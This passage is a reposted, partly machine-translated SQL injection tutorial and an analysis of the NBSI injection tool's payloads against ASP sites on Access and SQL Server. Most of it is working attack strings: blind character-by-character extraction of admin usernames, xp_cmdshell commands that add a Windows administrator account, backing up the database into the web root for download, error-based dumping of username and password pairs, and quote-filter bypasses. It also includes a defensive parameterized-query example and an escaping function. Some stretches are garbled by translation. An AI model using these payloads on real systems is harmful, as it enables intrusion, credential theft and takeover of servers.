(b) class=series. This type of injection parameter is a character type, and the SQL statement is roughly: SELECT * FROM tablename WHERE field='series'. The injected parameter is class=series' and [query condition] and ''=', which generates the statement: SELECT * FROM tablename WHERE field='series' and [query condition] and ''=''.

(c) Unfiltered parameters, such as keyword=keyword. The original SQL statement is roughly: SELECT * FROM tablename WHERE field LIKE '%keyword%'. The injected parameter is keyword=' and [query condition] and '%25'=', which generates the statement: SELECT * FROM tablename WHERE field LIKE '%' and [query condition] and '%'='%'.

Next, substitute the query condition into the SQL statement to guess table names, for example: id=49 and (select count(*) from admin)>=0. If the page is the same as for id=49, the additional condition holds, that is, the table admin exists; conversely, it does not exist (please remember this method). Loop like this until you guess a table name. After guessing the table name, replace count(*) with count(fieldname) and use the same method to guess the field names. Some people will say: there is some luck involved here; if the name is very complicated, there is no way to play.
It is very pair, this world does not exist 100% successful hacker technology, flies do not seamless eggs, no matter how many technologies, a few hackers, because others are not strict or not, the user is not confidential. I have to get it. I have a little bit, saying it back, for SQL Server library, there is a way to let the program tell us the name and field name, we will introduce in the advanced article. Finally, after the table name and column name are successful, use the SQL statement to get the value of the field, and the most common method is described below. Although this method is very slow, it must be feasible Methods.
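To show concretely why the three statement forms above are injectable and what closes the hole, here is an added example (not code from the original article) that rebuilds each form two ways: by pasting the parameter into the SQL text, as the vulnerable programs described on this page do, and by binding it as a query parameter, which is the alternative to the quote-escaping approach of the SafeRequest function given at the end of the article. It uses Python's built-in sqlite3 as a stand-in for Access/SQL Server, with a constructed article table and a constructed admin table so that the page's own probe id=49 and (select count(*) from admin)>=0 can be run against it; the table and column names are assumptions for the demonstration.

```python
import sqlite3

# Constructed sample schema (not from the page): an article table queried by
# the three parameter kinds, plus an "admin" table whose existence the page's
# probe `id=49 and (select count(*) from admin)>=0` tests for.
SCHEMA = """
CREATE TABLE article(id INTEGER, class TEXT, title TEXT);
INSERT INTO article VALUES (49, 'Continuous drama', 'Episode 1');
INSERT INTO article VALUES (50, 'Movie', 'Feature');
CREATE TABLE admin(username TEXT);
INSERT INTO admin VALUES ('admin1');
"""


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


# --- Vulnerable forms: the parameter is pasted into the SQL text ---
def unsafe_sql(kind, value):
    """Rebuilds the statement the page describes for each parameter kind."""
    if kind == "numeric":
        return f"SELECT * FROM article WHERE id={value}"
    if kind == "string":
        return f"SELECT * FROM article WHERE class='{value}'"
    if kind == "like":
        return f"SELECT * FROM article WHERE title LIKE '%{value}%'"
    raise ValueError(kind)


def unsafe_query(kind, value):
    # Whatever the caller appended becomes part of the WHERE clause.
    return connect().execute(unsafe_sql(kind, value)).fetchall()


# --- Hardened forms: the parameter is bound, never parsed as SQL ---
def safe_query(kind, value):
    conn = connect()
    if kind == "numeric":
        # Numeric context has no quotes to escape, so escaping cannot help;
        # validate the type instead and reject anything that is not a number.
        if not str(value).isdigit():
            raise ValueError("id must be numeric")
        return conn.execute("SELECT * FROM article WHERE id=?",
                            (int(value),)).fetchall()
    if kind == "string":
        # The bound value is compared as one literal; embedded quotes and
        # "and ..." fragments are data, not syntax.
        return conn.execute("SELECT * FROM article WHERE class=?",
                            (value,)).fetchall()
    if kind == "like":
        # Binding stops injection, but LIKE wildcards stay live inside the
        # bound value: escape % and _ so the caller cannot widen the search.
        escaped = (value.replace("\\", "\\\\")
                        .replace("%", "\\%")
                        .replace("_", "\\_"))
        return conn.execute(
            "SELECT * FROM article WHERE title LIKE ? ESCAPE '\\'",
            (f"%{escaped}%",)).fetchall()
    raise ValueError(kind)
```

With the page's probe appended to the numeric parameter, unsafe_query returns the same row as the plain id=49 request, which is exactly the "page looks the same, so the table exists" signal the text describes; safe_query refuses the value before any SQL runs. For the string form the probe returns the row through the vulnerable path and nothing through the bound one, and for the LIKE form a bare % matches every row unless the wildcard is escaped.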

Let's give an example. Suppose the username field is known to exist in the admin table. First take the first record and test its length:
    http://www.19cn.com/showdetail.asp?id=49 and (select top 1 len(username) from admin)>0
The principle: if the length of the username of the top 1 record is greater than 0, the condition holds; then test >1, >2, >3 ... until the condition fails. For example, if >7 holds and >8 does not, then len(username)=8. Of course nobody would be stupid enough to test 0, 1, 2, 3 one by one; how to go about it is up to each person. After obtaining the length of the username, use mid(username,N,1) to extract the Nth character, and then asc(mid(username,N,1)) to get its ASCII code, for example:
    id=49 and (select top 1 asc(mid(username,1,1)) from admin)>0
Likewise narrow down the ASCII code of the first character step by step. Note that the ASCII codes of English letters and digits lie between 1 and 128, so a binary search can speed up the guessing; if this is written as a program, the efficiency improves greatly.

Section 2. Common SQL injection functions

Someone with a SQL background has a much higher success rate at injection than someone unfamiliar with SQL. We must raise our SQL level, especially for some common functions and commands.
Access: asc(character)      SQL Server: unicode(character)     Purpose: returns the ASCII code of a character
Access: chr(number)         SQL Server: nchar(number)          Purpose: the inverse of asc; returns the character for an ASCII code
Access: mid(string,N,L)     SQL Server: substring(string,N,L)  Purpose: returns the substring of length L starting at character N, i.e. the characters between N and N+L
Access: abs(number)         SQL Server: abs(number)            Purpose: returns the absolute value of a number (used when guessing Chinese characters)
Access: A between B And C   SQL Server: A between B And C      Purpose: tests whether A lies between B and C

Section 3. Handling Chinese characters

Encountering Chinese characters during injection makes some people retreat. In fact, as long as you know a little about Chinese encoding, "Chinese phobia" is quickly overcome. A bit of common sense first: in Access, the ASCII code of a Chinese character may be negative; take the negative value and apply abs() to get the absolute value, and the Chinese character is unchanged. In SQL Server, the ASCII code of a Chinese character is positive, but because it is a two-byte Unicode encoding, ascii() cannot obtain it; unicode() must be used to return the code, and nchar() returns the corresponding Chinese character. Having understood these two points, don't you find that guessing Chinese is almost the same as English? Apart from the functions used, and paying attention to the range of values, the method is no different. After reading the entry and advanced articles, cracking a typical site should be no problem.

But what if you can't guess the table name, or the program author has filtered some special characters? How can you increase the success rate of injection? How can you improve guessing efficiency? Read on for the advanced part.

Section 1. Injecting a SQL Server database using the system tables

SQL Server is a powerful database system that is closely integrated with the operating system. This brings developers great convenience, but on the other hand it also provides a springboard for injection. Let's look at a few concrete examples:

1. http://Site/url.asp?id=1;exec master..xp_cmdshell "net user name password /add"--
In SQL Server the semicolon ";" separates two statements, and "--" makes the rest of the line a comment, so SQL Server executes this as two statements: first select the record with ID=1, then run the stored procedure xp_cmdshell, which is used to call system commands; here the net command creates a Windows account named name with password password. Then:

2. http://Site/url.asp?id=1;exec master..xp_cmdshell "net localgroup name administrators /add"--
adds the new account name to the Administrators group. Before you know it, you already have the highest authority on the system! Of course, this method only applies when the database is connected as sa; otherwise there is no permission to call xp_cmdshell.

3. http://Site/url.asp?id=1 and db_name()>0
This is similar to the earlier example and user>0, which obtains the connected user name; db_name() is another system variable, and it returns the name of the connected database.

4. http://Site/url.asp?id=1;backup database <database name> to disk='c:\inetpub\wwwroot\1.db';--
This one is quite nasty: take the database name from 3, add an absolute path exposed by an IIS error, back up the database into the web directory, and download the whole database over HTTP; every administrator and user password is exposed! When you don't know the absolute path, you can also back up to a network address (such as \\202.96.xx.xx\share\1.db), but the success rate is not high.

5. http://Site/url.asp?id=1 and (select top 1 name from sysobjects where xtype='u' and status>0)>0
sysobjects is a SQL Server system table that stores all table names, views, constraints and other objects; xtype='u' and status>0 selects the tables created by users. The statement above takes the first table name and compares it with a number so that the error message exposes it. How to get the second and third table names? That is left to our clever readers.

6. http://Site/url.asp?id=1 and (select top 1 col_name(object_id('table name'),1) from sysobjects)>0
After getting the table name from 5, object_id('table name') gets the internal ID of the table, and col_name(table ID,1) gives the first field name of the table; change 1 to 2, 3, 4, ... to get the field names of the specified table one by one.

The six points above are the hard-won essence of my study of SQL Server injection. You can see that the depth of understanding of SQL Server directly affects the success rate and guessing speed. After studying SQL Server injection, my development skills also improved a lot; perhaps security and development complement each other.

Section 2. Bypassing program restrictions to continue injecting

In the entry part we mentioned that many people like to use the ' character to test for injection vulnerabilities, so many people filter ' to "prevent" injection. This may block some entry-level attacks, but people who are more familiar with SQL can still use the relevant functions to bypass the program's restrictions. In the "general steps of SQL injection" section, the statements I used were optimized so that they contain no single quotes; in the "injecting a SQL Server database using the system tables" section, some statements contain ', so let's see with an example how to transform them. It is simple: for WHERE xtype='u', the ASCII code of the character u is 85, so WHERE xtype=char(85) can be used instead; if the character is Chinese, e.g. WHERE name='用户', it can be replaced with WHERE name=nchar(29992)+nchar(25143).

Section 3. Summary of experience

1. Some people filter certain keywords but forget about case sensitivity, so try varying the case, e.g. Select.
2. When you can't guess the field names, look at the login form on the website. Usually the field names are the same as the names of the form fields.
3. Special note: in the address bar, + is interpreted as a space, %2B as +, and %25 as %. See URLEncode for the details.
4. When injecting with the GET method, IIS records every string you submit; it does not record POST data. So where you can use POST, try not to use GET.
5. The ASCII decoding method introduced in the entry part also works for SQL Server; the only difference is that SQL Server can expose values through error messages, and when the error information can be exposed, efficiency and accuracy improve greatly.

Defense

The SQL injection vulnerability can be described as "a thousand-mile dike collapsing from an ant hole": it is extremely common online, usually because the programmer does not understand injection, or the program is not rigorous, or a parameter was forgotten.

Here I give you a function to use instead of the Request function in ASP; with it you can say NO to all SQL injection. The function is as follows:

    Function SafeRequest(paraName, paraType)
        '--- Incoming parameters ---
        'paraName: parameter name - string
        'paraType: parameter type - number (1 means the parameter is numeric, 0 means it is a string)
        Dim paraValue
        paraValue = Request(paraName)
        If paraType = 1 Then
            'Numeric parameters must be numbers; anything else is rejected outright
            If Not IsNumeric(paraValue) Then
                Response.Write "Parameter " & paraName & " must be numeric!"
                Response.End
            End If
        Else
            'String parameters: double every single quote so it cannot close the literal
            paraValue = Replace(paraValue, "'", "''")
        End If
        SafeRequest = paraValue
    End Function

2004-11-28 6:51 PM | Hnxyy
I don't understand.

2004-11-30 2:48 PM | 111
Don't understand ~

2004-12-02 3:44 PM | Cornermoss
Can't follow it.

2004-12-02 10:12 PM | zhuzhu
http://666W.com/Art/731.htm

NBSI Injection Analysis Tracking Report (MSSQL)

Preface: Writing a good tool is not easy, and writing an injection tool is not easy either. This article systematically analyzes the author's testing ideas by tracking NBSI's injection process, which is very helpful for manual analysis. Carefully tracking NBSI's injection results is also a kind of appreciation of injection attacks. First we found an IT site for testing. The purpose of the test was only to track NBSI's injection ideas, without maliciously damaging the site!

1. Detecting the injection point

Assume the injection point is http://www.xxx.com/zhuru.asp?id=1. NBSI will first try this link:
    http://www.xxx.com/zhuru.asp?id=1 and user%2bchar(124)>0
At first I didn't understand why char(124) is appended; this value is actually the "|" symbol. We will come back to it later. Of course IIS will report an error here and return a 500 internal error, and perhaps the author uses this as the basis for the decision.

3. Guessing the table name

Tracking found that the author completes a table name guess with one statement, and the efficiency is indeed high.
The specific table name guessing code:
    and (select top 1 cast(name as varchar(8000)) from (select top 1 id,name from sysobjects where xtype=char(85) order by id) t order by id desc)>0
See the red 1? That is the sequence number of the table name in the data table! For the first table it is of course 1; for the second table, change this 1 to 2, and so on. So how do we decide whether all the table names have been guessed? Simple: tracking found that as long as the table name returned for value X and for value X+1 is the same, we are done.

5. Guessing the column names

Tracking found that the author completes a column name guess with one statement as well. Maybe this is the benefit of guessing MSSQL! With Access it may come down to guessing letter by letter.

The specific column name guessing code:
    and (select top 1 cast(name as varchar(8000)) from (select top 1 colid,name from syscolumns where id=object_id(nchar(78)%2Bnchar(101)%2Bnchar(119)%2Bnchar(115)%2Bnchar(95)%2Bnchar(85)%2Bnchar(115)%2Bnchar(101)%2Bnchar(114)) order by colid) t order by colid desc)>0
See the red 1? This is the sequence number of the column name we want to guess; replacing it with 2 means guessing the second column name. The way to judge the end is the same as for table names.

Note: nchar(78)%2Bnchar(101)%2Bnchar(119)%2Bnchar(115)%2Bnchar(95)%2Bnchar(85)%2Bnchar(115)%2Bnchar(101)%2Bnchar(114). To avoid the ' symbol, the author concatenates the table name as a string of characters. The string above actually represents the name of one table; the numbers in parentheses are the ASC codes of the characters. Example: if we have to guess the table named XFileTd, we use Huie's plugin to convert it. See below:
[img]http://666w.com/uploadimages/bugimage002.jpg[/img]
We get the following characters: nchar(78)%2BNCHAR(66)%2BNCHAR(69)%2BNCHAR(6C)%2BNCHAR(65)%2BNCHAR(74)%2BNCHAR(75). Fast, huh!

6. Taking the data

Let's look at how NBSI guesses data. It should be by "brute force"; let's see how this expert brute-forces.

1) Number of records
    and (select cast(count(1) as varchar(8000))%2Bchar(124) from [News_Style] where 1=1)>0
The red News_Style is the table name we want to query. Here the author uses a commonly used trick: after we get the record count, the value is of int type, and comparing it with 0 does not cause a type conversion error; in other words, the record count will not "confess" by itself. If, before the comparison with 0, we concatenate it with char(97) (the character a), we get a string, and when it is compared with zero, the record count followed by a naturally comes out.
Now everyone knows why the first step appends the "|" symbol! Quite a mystery.

2) Getting the field values
After obtaining the record count, the field values are taken. Fortunately, the author does not use any strange trick here. The author's code:
    and (select top 1 isnull(cast([Sname] as varchar(8000)),char(32))%2bchar(124) from (select top 9 Sname from [News_Style] where 1=1 order by Sname) t order by Sname desc)>0
I won't explain the red News_Style; it is the data table name we guessed. The green 9 means take the value of the Sname field in the 9th record. Loop a few times and, ha, the data is in hand. Everyone note char(124): its purpose is to convert the data into a string type and then compare it with the int type, which throws the data out.

The truth is as described above! This is why the field values NBSI shows have a "|" in them. The author was probably too lazy to handle it. :-)
[img]http://666w.com/uploadImages/bugimage006.jpg[/img]
There is a "|" symbol after the value.

3) Guessing two fields or N fields at once
Everyone may think NBSI guesses data fields very fast, and tracking and analysis shows that it is true. Suppose we want to guess the values of 2 fields of a table; how should the code be written? NBSI writes it this way: the first step is still the record count method from 1). The second step is:
    and (select top 1 isnull(cast([Username] as varchar(8000)),char(32))%2Bchar(124)%2Bisnull(cast([Password] as varchar(8000)),char(32)) from (select top 1 Username,Password from [news_user] where 1=1 order by Username,Password) t order by Username desc,Password desc)>0
(Note: the | symbol separates the 2 values.) news_user is the table name; I won't explain char(124). Everyone can compare this with the statement in 2). I wanted to see how the author obtains multiple field values. If you like, it doesn't matter if you take all the values of the database in one go. An indirect reminder: the network overhead of brute-forcing values this way is not much; when using NBSI, remember to pull all the values at once!

Summary: Friends who want to write their own VB code may write programs based on our analysis, and you will have your own NBSI. Today's Huie has such a function. I hope everyone goes to www.hack0.net to have a look.

Postscript: The most important thing in writing a program is the programming idea; maybe when you see some details of a good program you think nothing of them. How does NBSI determine whether a website is injectable? In fact, it is just SQL thinking. The two ideas NBSI shows us are:
2. Judging by IIS's header: a normal return is 200 or 101; if 500 is returned, it indicates an error.
3. Verify IIS's returned information word by word, then compare to judge the possibility of injection! (Because the HTML returned by some websites is very large, the judging program still costs time; not recommended.)

There are many more things we actually need to learn, not only NBSI but injection itself. NBSI is actually a large piece of software; our analysis was done in a state where IIS error prompts are turned on, and with the "numeric" injection method, so it is somewhat limited. We will continue tracking to fully explore NBSI's injection ideas. Judging Access injection may be a nameless programming item. If it were you, could you write it? There are still many places where NBSI is not perfect; having read our article, maybe you have a way to write a more powerful NB. Interested friends can keep following our NBSI analysis reports. More capable people can send their own small network plugins to www.hack0.net!

PS: For an introduction to Huie and Huie plugins, please check www.hack0.net. More detailed discussion can be had on the forum at www.hackerxfiles.net.

Please credit the original source when reposting: https://www.9cbs.com/read-41681.html
